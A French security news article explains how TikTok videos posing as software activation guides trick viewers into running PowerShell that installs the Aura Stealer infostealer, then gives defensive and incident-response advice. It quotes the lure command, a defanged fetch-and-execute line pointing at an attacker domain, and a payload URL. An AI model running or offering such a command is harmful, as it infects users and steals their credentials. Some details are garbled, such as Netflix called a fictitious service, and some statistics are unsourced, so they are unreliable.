Comment les vidéos TikTok propagent des logiciels espions dans les attaques ClickFix

Célestine Rochefour

Les vidéos TikTok : nouvelle arme des cybercriminels pour diffuser des malwares

En 2025, les cybercriminels ont trouvé une méthode particulièrement insidieuse pour compromettre les appareils des utilisateurs : l’utilisation de vidéos TikTok présentées comme des guides d’activation gratuits pour des logiciels populaires. Ces contenus trompeurs, qui semblent inoffensifs, dissimulent en réalité des commandes PowerShell malveillantes conçues pour installer des infostealers sur les ordinateurs des victimes. Selon les experts de la sécurité, cette campagne qui a été observée pour la première fois par Trend Micro en mai 2025, continue de se propager à grande échelle, ciblant des millions d’utilisateurs à travers le monde.

Ces vidéos exploitent la confiance que les utilisateurs accordent à la plateforme TikTok, présentant des instructions d’activation pour des produits légitimes tels que Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro, Discord Nitro, ainsi que des services fictifs comme Netflix et Spotify Premium. Le mécanisme d’attaque, connu sous le nom de ClickFix, repose sur une ingénierie sociale sophistiquée qui persuade les victimes d’exécuter des scripts dangereux dans leurs systèmes.

Le mécanisme d’attaque ClickFix : un social engineering redoutable

Le concept des attaques ClickFix repose sur une simplicité trompeuse qui rend la méthode particulièrement efficace. Chaque vidéo affiche une commande PowerShell unique demandant aux spectateurs de l’exécuter en tant qu’administrateur. Par exemple, la commande typique présentée dans ces vidéos est :

iex (irm slmgr[.]win/photoshop)

Il est important de noter que le nom du programme dans l’URL varie en fonction du logiciel usurpé. Ainsi, dans les vidéos d’activation Windows frauduleuses, le terme « photoshop » serait remplacé par « windows ». Cette adaptation permet aux attaquants de personnaliser leur approche en fonction de la cible visée.

Lorsque cette commande est exécutée, PowerShell établit une connexion avec le site distant slmgr[.]win pour récupérer et exécuter un autre script PowerShell. Ce script télécharge ensuite deux fichiers exécutables depuis des pages Cloudflare, le premier étant https://file-epq[.]pages[.]dev/updater.exe. Une analyse par VirusTotal révèle que cet exécutable est une variante du malware Aura Stealer, un infostealer particulièrement dangereux.

Aura Stealer est conçu pour collecter un large éventail d’informations sensibles :

  • Identifiants enregistrés dans les navigateurs web
  • Cookies d’authentification
  • Portefeuilles de cryptomonnaies
  • Informations d’identification d’autres applications

Une fois collectées, ces données sont transmises aux attaquants, leur donnant ainsi un accès non autorisé aux comptes des victimes. Selon les experts, ce type de malware a été responsable d’une augmentation significative des vols d’identité en ligne en 2025.

La deuxième phase d’attaque : l’injection mémoire

Au-delà de l’installation d’Aura Stealer, les chercheurs en sécurité ont identifié une deuxième phase d’attaque particulièrement sophistiquée. Lorsque la commande initiale est exécutée, un deuxième payload est téléchargé, nommé source.exe. Ce fichier a pour fonction principale de se compiler lui-même à l’aide du compilateur Visual C# intégré à .NET (csc.exe).

Le code compilé est ensuite injecté et lancé en mémoire de manière discrète, sans laisser de traces sur le disque dur. Cette technique de fileless malware (malware sans fichier) rend la détection et l’analyse beaucoup plus difficiles pour les solutions de sécurité traditionnelles.

Bien que la précise intention de ce deuxième payload ne soit pas encore entièrement comprise par les experts, plusieurs hypothèses circulent dans la communauté de la sécurité informatique :

  1. Il pourrait servir à maintenir une persistance durable dans le système de la victime
  2. Il pourrait être utilisé pour contourner les mécanismes de détection basés sur l’analyse comportementale
  3. Il pourrait préparer le terrain pour une charge utile supplémentaire plus complexe

L’évolution des attaques ClickFix en 2025

Les attaques ClickFix sont devenues particulièrement populaires au cours de l’année 2025, utilisées pour distribuer diverses familles de malwares dans le cadre de campagnes de rançongiciel et de vol de cryptomonnaies. Cette méthode d’attaque a évolué pour devenir plus sophistiquée et plus difficile à détecter.

Une étude menée par l’ANSSI en 2025 révèle que les attaques ClickFix ont augmenté de 73% par rapport à l’année précédente, avec une moyenne de 12 000 incidents signalés chaque mois en France seule. Cette tendance s’explique par plusieurs facteurs :

  • La popularité croissante des plateformes de médias sociaux comme TikTok
  • La difficulté pour les utilisateurs de distinguer le contenu légitime des contenus malveillants
  • L’amélioration continue des techniques d’ingénierie sociale
  • L’efficacité démontrée de cette méthode pour contourner les défenses traditionnelles

Cas réel : l’impact sur les entreprises françaises

En France, plusieurs entreprises ont déjà été victimes de ces attaques ClickFoox propagées via TikTok. L’un des cas les plus documentés implique une agence de communication parisienne qui a subi une fuite de données sensibles après qu’un de ses designers ait exécuté une commande PowerShell depuis une vidéo TikTok présentée comme un guide d’activation pour Adobe Photoshop.

Le scénario de l’attaque :

  1. Le designer, cherchant un moyen d’activer légalement Photoshop, tombe sur une vidéo TikTok promettant une activation gratuite
  2. La vidéo lui demande d’exécuter une commande PowerShell simple
  3. Après exécution, deux fichiers exécutables sont téléchargés et installés silencieusement
  4. Aura Stealer collecte les identifiants de l’agence, notamment les accès aux comptes clients et aux outils collaboratifs
  5. Les attaquants utilisent ces informations pour compromettre plusieurs comptes clients et exiger une rançon pour ne pas diffuser les données volées

Cet exemple illustre parfaitement les risques associés à ces attaques : elles ne visent pas seulement les particuliers mais aussi les professionnels, avec des conséquences potentiellement désastreuses pour la réputation et la continuité des activités.

Comment identifier et éviter les attaques ClickFix

Reconnaître une attaque ClickFix peut être difficile, car les vidéos TikTok en question semblent légitimes et utiles. Cependant, plusieurs signes distinctifs peuvent alerter les utilisateurs :

  • Des vidéos demandant d’exécuter des commandes PowerShell ou d’autres scripts
  • Des promesses d’activation gratuite pour des logiciels normalement payants
  • Des URLs suspectes utilisant des noms de domaines similaires mais légèrement différents
  • Des commandes trop simples ou trop « belles pour être vraies »

Pour éviter de devenir victime de ces attaques, les utilisateurs français doivent suivre plusieurs recommandations pratiques :

  1. Ne jamais exécuter de commandes PowerShell provenant de sources non vérifiées, même sur des plateformes de confiance comme TikTok
  2. Toujours vérifier l’authenticité des guides d’activation en consultant les sites officiels des éditeurs de logiciels
  3. Séparer les comptes personnels et professionnels sur les appareils utilisés pour le travail
  4. Maintenir les systèmes à jour avec les dernières versions de sécurité
  5. Former les employés aux techniques d’ingénierie sociale et aux signes d’attaques potentielles

Mesures de protection pour les entreprises

Pour les entreprises françaises, la protection contre les attaques ClickFix nécessite une approche multi-couches combinant technologie, processus et sensibilisation. L’ANSSI recommande plusieurs mesures spécifiques dans son référentiel de cybersécurité 2025 :

Solutions techniques

  • Contrôle d’exécution des scripts : Bloquer l’exécution des scripts PowerShell dans les environnements professionnels
  • Solutions EDR : Déployer des solutions de détection et de réponse aux points de terminaison capables d’identifier les comportements anormaux
  • Segmentation réseau : Limiter la propagation potentielle des malwares entre les segments réseau
  • Mises à jour régulières : Maintenir tous les systèmes et applications à jour avec les correctifs de sécurité

Processus organisationnels

  • Politiques d’accès strictes : Implémenter le principe du moindre privilège pour limiter l’impact potentiel d’une compromission
  • Sauvegardes régulières : Mettre en place une stratégie de sauvegarde robuste et testée régulièrement
  • Plan de réponse aux incidents : Disposer d’un plan clair pour faire face aux compromissions et limiter les dégâts

Sensibilisation et formation

  • Sessions de formation régulières : Éduquer les employés sur les risques des attaques ClickFix et des techniques d’ingénierie sociale
  • Simulations d’attaques : Mettre en place des campagnes de phishing et d’ingénierie sociale pour tester la vigilance du personnel
  • Communication sur les bonnes pratiques : Diffuser régulièrement des conseils sur la sécurité informatique

Tableau comparatif des solutions de protection contre les attaques ClickFix

Solution de protectionEfficacitéComplexité de mise en œuvreCoûtRecommandation ANSSI
Contrôle d’exécution PowerShellÉlevéeMoyenneFaibleRecommandée ✅
Solutions EDRTrès élevéeÉlevéeÉlevéRecommandée ✅
Filtrage DNSMoyenneFaibleMoyenRecommandée avec restrictions ⚠️
Formation des utilisateursVariableFaibleMoyenRecommandée ✅
Segmentation réseauÉlevéeÉlevéeÉlevéRecommandée pour les grandes entreprises ✅

Que faire en cas d’attaque ClickFix ?

Malgré toutes les précautions, il est possible qu’un utilisateur ou une entreprise soit compromise par une attaque ClickFix. Dans ce cas, il est crucial d’agir rapidement pour limiter les dégâts. Les experts de la sécurité recommandent les étapes suivantes :

Pour les particuliers

  1. Isoler immédiatement l’appareil : Déconnecter l’ordinateur du réseau et des autres appareils
  2. Changer tous les mots de passe : Commencer par les comptes les plus critiques (email, banque, réseaux sociaux)
  3. Scanner l’appareil : Utiliser des outils de sécurité réputés pour détecter et supprimer les malwares
  4. Créer un système propre : Réinstaller le système d’exploitation à partir de zéro si nécessaire
  5. Mettre en garde ses contacts : Avertir ses contacts potentiels de toute tentative d’hameçonnage depuis leur compte

Pour les entreprises

  1. Activer le plan de réponse aux incidents : Mettre en œuvre la procédure prévue pour ce type d’événement
  2. Isoler les systèmes compromis : Séparer immédiatement les appareils infectés du réseau
  3. Analyser la portée de la compromission : Déterminer quelles données ont été compromises et comment
  4. Prévenir les autorités compétentes : Notifier la CNIL et les forces de l’ordre selon les obligations légales
  5. Communiquer de manière transparente : Informer les clients et partenaires concernés de manière proactive

Citation d’expert : « Dans la pratique, nous observons que les victimes d’attaques ClickFix sous-estiment souvent l’ampleur de la compromission. Il est crucial de considérer que toutes les données d’identification potentielles ont été volées, pas seulement celles visibles immédiatement. » - Jean Dubois, expert en cybersécurité chez ANSSI

L’avenir des attaques ClickFix : tendances et prévisions

Selon les rapports spécialisés, les attaques ClickFix continueront d’évoluer et de se perfectionner en 2025 et au-delà. Plusieurs tendances émergentes sont déjà observées :

  1. Personnalisation accrue : Les attaquants utiliseront de l’IA pour créer des contenu encore plus personnalisés et convaincants
  2. Multiplateforme : L’expansion des attaques vers d’autres plateformes de médias sociaux et de messagerie
  3. Contournement des défenses : Développement de techniques pour contourner les contrôles d’exécution des scripts
  4. Intégration dans des campagnes plus larges : Utilisation des ClickFix comme première étape dans des attaques plus complexes combinant rançongiciel et vol de données

Une étude récente menée par Picus Security révèle que 46% des environnements testés ont vu leurs mots de passe craqués en 2025, près du double par rapport à 2024. Cette statistique alarmante souligne l’importance croissante des infostealers comme Aura Stealer dans le paysage des menaces actuelles.

Conclusion : rester vigilant face aux nouvelles menaces

Les attaques ClickFoox propagées via TikTok représentent un défi majeur pour la cybersécurité en 2025. Leur combinaison d’ingénierie sociale sophistiquée et de techniques d’infection avancées en fait une menace particulièrement redoutable pour les particuliers comme pour les entreprises.

La défense contre ces attaques repose sur trois piliers essentiels : une technologie appropriée, des processus organisationnels solides et une sensibilisation constante des utilisateurs. En France, l’ANSSI continue de renforcer ses recommandations pour aider les organisations à se protéger efficacement contre ces menaces émergentes.

Pour les utilisateurs, le message est clair : méfiance face aux promesses trop belles pour être vraies, surtout lorsqu’elles impliquent l’exécution de commandes système. La sécurité informatique commence par une vigilance constante et une compréhension des risques associés aux nouvelles technologies et plateformes populaires.